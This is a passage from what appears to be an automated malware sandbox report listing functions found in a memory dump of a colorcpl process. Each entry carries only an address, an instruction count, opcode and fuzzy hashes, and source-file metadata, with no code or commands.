                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                          • Instruction ID: 11379a11336f541b2ab2365f98ab582829b7e752b13f719d4e48e6d4122d58e1
                                                                                                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                          • Instruction Fuzzy Hash: 6A21F4B5A40B059FD3A0CF29C580B52BBF4FB48B10F104A2EE98AC7B40E371E814CB90
                                                                                                                                          Function 227EA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                          • Instruction ID: 1784e9910fac2a7008afe1a0cab1dd931cc525533bb5c364d34e34edf46d67f6
                                                                                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                          • Instruction Fuzzy Hash: E4110433A04A09AFCB1ACB64C805F9DB7F5EF94310F058269E84AA7350E675AD01CBD0
                                                                                                                                          Function 227AE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                          • Instruction ID: 502a0628f47ad679e7b559fc0753c6bfa0ac884adb2571d02d4b5f7568444e05
                                                                                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                          • Instruction Fuzzy Hash: 3A11C231608700EFD7218F44CD56F4A77E5EF55768F119638EA88AB260DB31DD40DBA0
                                                                                                                                          Function 227427ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b0bb2dd329d155168fa967f1cd5d65dcd2c98ce9873087c4118af38d1de909c7
                                                                                                                                          • Instruction ID: 4a1cf92d17099b9c710a1f8619e00614fe4399e6c65aa38b91c973ec9c21de84
                                                                                                                                          • Opcode Fuzzy Hash: b0bb2dd329d155168fa967f1cd5d65dcd2c98ce9873087c4118af38d1de909c7
                                                                                                                                          • Instruction Fuzzy Hash: FD01D631B0D784ABE313926AD989F1B7B9CEF90394F450075FA00DB251ED68DC10D2B2
                                                                                                                                          Function 22724690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 64a049e9da593c673940d548b6764dbe55f0109838c795274b6db8b343771101
                                                                                                                                          • Instruction ID: 9632ac5d1d73d1588bbf674751cb5450f664cd8e90622432bb1df213c0f70837
                                                                                                                                          • Opcode Fuzzy Hash: 64a049e9da593c673940d548b6764dbe55f0109838c795274b6db8b343771101
                                                                                                                                          • Instruction Fuzzy Hash: 1D11C236209B45AFDB11CF55C994F467BB8EB857A8F004635F9289B750C730E800CF60
                                                                                                                                          Function 227F4B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cf8dade58e7625e9a48c2e619f73c3ff514f31dc44a03db5e31454ce353b211d
                                                                                                                                          • Instruction ID: 9e2a48d451bd0491d9563304f3c597aa013653f1db3898146aaaa99bd8b531bb
                                                                                                                                          • Opcode Fuzzy Hash: cf8dade58e7625e9a48c2e619f73c3ff514f31dc44a03db5e31454ce353b211d
                                                                                                                                          • Instruction Fuzzy Hash: DD11C23A20C7109FD7228A29D954F56B7A6FFC4710F15453AEB86C7791DA34E902CB90
                                                                                                                                          Function 22756620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 294484e1279584e190c4e07203df87e9ccf623689ce6d37cbad80b78c9523cd9
                                                                                                                                          • Instruction ID: c3b4e261404ad976469a3eef35792432bd905c1b30b805399e0238e4ca79a4dd
                                                                                                                                          • Opcode Fuzzy Hash: 294484e1279584e190c4e07203df87e9ccf623689ce6d37cbad80b78c9523cd9
                                                                                                                                          • Instruction Fuzzy Hash: 9411CE72A01714EBCB22CF58CA80B5EF7F8EF88744F510498EE01A7241DB34ED518BA0
                                                                                                                                          Function 2274EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f04c34fc29d4bc3ba6f9512cf9ce3cc787b376d080ace05ae8256e3272fd4757
                                                                                                                                          • Instruction ID: b670372e58a99b984f3ebb604413ba66a0430dfd3f42258ace37a8a0103ecdfe
                                                                                                                                          • Opcode Fuzzy Hash: f04c34fc29d4bc3ba6f9512cf9ce3cc787b376d080ace05ae8256e3272fd4757
                                                                                                                                          • Instruction Fuzzy Hash: B501DE71A043089FD302CF14C548F26BBF9FB85328F20856AE0058B6A0DBB8EC41CB94
                                                                                                                                          Function 2274E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                          • Instruction ID: 284aa12d1a3fabb123f602ad9589eb11e8a4840866f71d029d8d52902d03955f
                                                                                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                          • Instruction Fuzzy Hash: E711E57160D7D59BD3138B29DA48F0677E4EB417A8F5500A0EE40DB653EF38C942D253
                                                                                                                                          Function 227AE75D Relevance: .1, Instructions: 54COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                          • Instruction ID: d39a074f62b2605fe608acb9feb854653df2dba86ed29c9ac81c5c87ef3db504
                                                                                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                          • Instruction Fuzzy Hash: 0E01D232609306EFD7128F54C954F5A77A9EB84774F118634EB849B260E771DD80CB90
                                                                                                                                          Function 2271A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                          • Instruction ID: f67c6a31ad76cee9a99507d152605a3bbe63c05dec906d13f9139353a1fc534e
                                                                                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                          • Instruction Fuzzy Hash: 11014572419B119BC7258F15D940A237BF4FF99B60B108A2DFC959F681C339D900CBB0
                                                                                                                                          Function 227F4940 Relevance: .1, Instructions: 52COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6dc6ff08b69d60972398fc70a01f0d2ede98a67b7dfad94395f8f842c7d0ad30
                                                                                                                                          • Instruction ID: 3c8866c55f54cac2bd4619063827d260b16c9358e7e119bc61a3b7ef80280776
                                                                                                                                          • Opcode Fuzzy Hash: 6dc6ff08b69d60972398fc70a01f0d2ede98a67b7dfad94395f8f842c7d0ad30
                                                                                                                                          • Instruction Fuzzy Hash: 9D01C07364D7109BC322CF18C954F02B7A8FB91774B214265EEA89B2A6E730ED01CBD0
                                                                                                                                          Function 22726259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 81d8fb1dde5f5272d90f74ffffa20a0fb0e281f73c218937411b16ef05f709fd
                                                                                                                                          • Instruction ID: 5239d26cda4dbae5b4247d0495a9bb772daef9437131f422426e4cb6b21133dc
                                                                                                                                          • Opcode Fuzzy Hash: 81d8fb1dde5f5272d90f74ffffa20a0fb0e281f73c218937411b16ef05f709fd
                                                                                                                                          • Instruction Fuzzy Hash: B311AC70549328ABDB66CB24CD46FE9B3B4EF14710F5042D5A718AB0E0EB709E85CF84
                                                                                                                                          Function 2279E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2d1fdd31825d213ce1568555c1cb387b749a34424560c750934eccc457b544f2
                                                                                                                                          • Instruction ID: 8f5caea61343b305dd9f9281e9911bf7a83dd4a34680847c9af7ab206f848503
                                                                                                                                          • Opcode Fuzzy Hash: 2d1fdd31825d213ce1568555c1cb387b749a34424560c750934eccc457b544f2
                                                                                                                                          • Instruction Fuzzy Hash: C811AD36245B40EFCB16DF18DE94F56B7B8FF58B44F200066E9059B6A1C635ED01CA90
                                                                                                                                          Function 227A6050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: afd8630d15ddccc446935bfde3847e945924b6314971eae75f24b80b5827b304
                                                                                                                                          • Instruction ID: 322132675bcd82c083d507b11cddaa09c9eaedf67d3da1771ae882d7dbc6a170
                                                                                                                                          • Opcode Fuzzy Hash: afd8630d15ddccc446935bfde3847e945924b6314971eae75f24b80b5827b304
                                                                                                                                          • Instruction Fuzzy Hash: 74112D73900219ABCB12DB94CC85EDFB7BCEF48354F044166E906E7211EA34EA54CBE0
                                                                                                                                          Function 2272208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                          • Instruction ID: 47110cafe60c2b58c18159a2df378dcc72bb99438da3fb0bfdc5a2ba57d57fdd
                                                                                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                          • Instruction Fuzzy Hash: 460124326097008BDF118E69DA80F827776FFE4700F5546A5EE048F25AEEB1CC81C3A0
                                                                                                                                          Function 227B6500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: eddf0f7fd15b1603a3b8ef61d91fb9f1fb74fccf31249ad743fca3eafcaf2a3b
                                                                                                                                          • Instruction ID: 47ed0d8309584de71d8012d2280c3158bdf1331d85ae2cac1217b5e1215d3e81
                                                                                                                                          • Opcode Fuzzy Hash: eddf0f7fd15b1603a3b8ef61d91fb9f1fb74fccf31249ad743fca3eafcaf2a3b
                                                                                                                                          • Instruction Fuzzy Hash: 7711A1726482559FC301CF58C940B92B7B9FF5A314F088159EA48CB356D732E980CBA0
                                                                                                                                          Function 227CEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9caa9866072c5227b9066adf4822f247c8f2f82879c48eeeacf2176ac83b37a4
                                                                                                                                          • Instruction ID: 57e811669c0646b32a80c9680edde103ffe76134306e775803254003d0357d73
                                                                                                                                          • Opcode Fuzzy Hash: 9caa9866072c5227b9066adf4822f247c8f2f82879c48eeeacf2176ac83b37a4
                                                                                                                                          • Instruction Fuzzy Hash: 5601DF321493609FC7239F318944E3EBBA9FFA27A0B44486EE5405B252CB71ED81CB95
                                                                                                                                          Function 227AC810 Relevance: .0, Instructions: 50COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e41f1762dc55d89e6308c53173384e24dc17feb46fade6b26b0820d2db9e8184
                                                                                                                                          • Instruction ID: 70805ba0b84110006535898ac1167e1ee9518e2fbaefa57525df89dd37ff1a98
                                                                                                                                          • Opcode Fuzzy Hash: e41f1762dc55d89e6308c53173384e24dc17feb46fade6b26b0820d2db9e8184
                                                                                                                                          • Instruction Fuzzy Hash: 071118B1E00309ABCB00DFA9D545AAEB7F8FF58350F10406AB905E7351D674EA01CBA4
                                                                                                                                          Function 2271C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                          • Instruction ID: 47d105b669c421f111375fd19090a9e039ea2a4f4745369d43a8b3de061605e4
                                                                                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                          • Instruction Fuzzy Hash: DD01F5322087449FDB228666C900F9773F9FFC5314F40451DBA458B540DA70E501C761
                                                                                                                                          Function 227620F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bb46c00d85c5b8bc50efac6ee848b58b8effb515abe11c39aa8dbb0ba17890cd
                                                                                                                                          • Instruction ID: 601e684cca7f4430e5e333ddb2cf951080dd1d09665ab428827362d197978c0e
                                                                                                                                          • Opcode Fuzzy Hash: bb46c00d85c5b8bc50efac6ee848b58b8effb515abe11c39aa8dbb0ba17890cd
                                                                                                                                          • Instruction Fuzzy Hash: BE116D31A0930CAFCB05DF64D854FAE7BB5EB54344F004059FD119B290E6359E11CB90
                                                                                                                                          Function 2275E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8e0da346614d57a43d8c66625dde1e2e62236052f8489e81da77c11a2a6c7290
                                                                                                                                          • Instruction ID: 7058f61f071d767cfa2aad9571f68ae72a2d5ed312a24474d0b709a939fa192e
                                                                                                                                          • Opcode Fuzzy Hash: 8e0da346614d57a43d8c66625dde1e2e62236052f8489e81da77c11a2a6c7290
                                                                                                                                          • Instruction Fuzzy Hash: CE018F72606B50BBD3139B79CD88E57B7ACFBA47A4B000669B10487692DB64EC11CAE0
                                                                                                                                          Function 227B69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 12ff479c01f2996b79a534a26bb913c72f15f171d2b95c5f1f4bcc4db322b884
                                                                                                                                          • Instruction ID: 23e383a45eb1af2b81b36913bf1287c65b416f618aa5a25bf461303c9fb6a2a1
                                                                                                                                          • Opcode Fuzzy Hash: 12ff479c01f2996b79a534a26bb913c72f15f171d2b95c5f1f4bcc4db322b884
                                                                                                                                          • Instruction Fuzzy Hash: A5014C322293059BC720DF69C888DA7B7A8EF8A764F104229FA18972C0E7309941C7D1
                                                                                                                                          Function 227AC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3300c1c23743264898e738f835f62d69a943fab19c899380c249d0637d5b7393
                                                                                                                                          • Instruction ID: 201b50de3841f4cb582869d2e7d2f9fc05c76b00a181e0d2506d9ee31e2c853d
                                                                                                                                          • Opcode Fuzzy Hash: 3300c1c23743264898e738f835f62d69a943fab19c899380c249d0637d5b7393
                                                                                                                                          • Instruction Fuzzy Hash: CA115B75A0530CABCF16DFA4C854EAE7BB5FB48354F004159BD0197384DA35D911CB90
                                                                                                                                          Function 227ACA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d3e7cc08cc5f93ba6937c31b3bff24975e3a21dce4ad5de441645dc7a47dc4ab
                                                                                                                                          • Instruction ID: a8e7cd714f0903be18f34ad2e51e576615df41461bd0b6ca4217fc58ccbf739a
                                                                                                                                          • Opcode Fuzzy Hash: d3e7cc08cc5f93ba6937c31b3bff24975e3a21dce4ad5de441645dc7a47dc4ab
                                                                                                                                          • Instruction Fuzzy Hash: 41118BB16183089FC300CF69C44596BBBF4EF99750F008A1EF958D73A0E630E900CBA6
                                                                                                                                          Function 227F4A80 Relevance: .0, Instructions: 48COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                          • Instruction ID: 5ce60eae87e28306c807837d5fbeab6f6f1b2e18876050de2a6ed56d9f1b82df
                                                                                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                          • Instruction Fuzzy Hash: 6401D83220CB059FD7118A59D954F57B7E6FBC5314F044429F7528B750DA70F840D794
                                                                                                                                          Function 227AC97C Relevance: .0, Instructions: 48COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e937e0f48e80cababf977fea91677de59f33ede2b9c68ac73ae5f4128b095129
                                                                                                                                          • Instruction ID: f18b778e0453a862666e0f913f5bbafccf2ba378e673a2910fbb41809a320caf
                                                                                                                                          • Opcode Fuzzy Hash: e937e0f48e80cababf977fea91677de59f33ede2b9c68ac73ae5f4128b095129
                                                                                                                                          • Instruction Fuzzy Hash: D71139B16193089FC700DF69D445A5BBBE4EF99710F004A1EB998D7391E634E900CBA2
                                                                                                                                          Function 2271826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8f0e0afd8760c8aff354b6fe29b8bee0465cc3d6f257ec0e19b7e8a17fab8887
                                                                                                                                          • Instruction ID: 933fce632d428921207a543b1a57b61be6acc8cf8c23925fc99fe9b5e152cc6e
                                                                                                                                          • Opcode Fuzzy Hash: 8f0e0afd8760c8aff354b6fe29b8bee0465cc3d6f257ec0e19b7e8a17fab8887
                                                                                                                                          • Instruction Fuzzy Hash: 0101F731708704DBEB0ACF69DD549AF77F9AF84724B850129A901EB694DE30DD01C290
                                                                                                                                          Function 2273E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
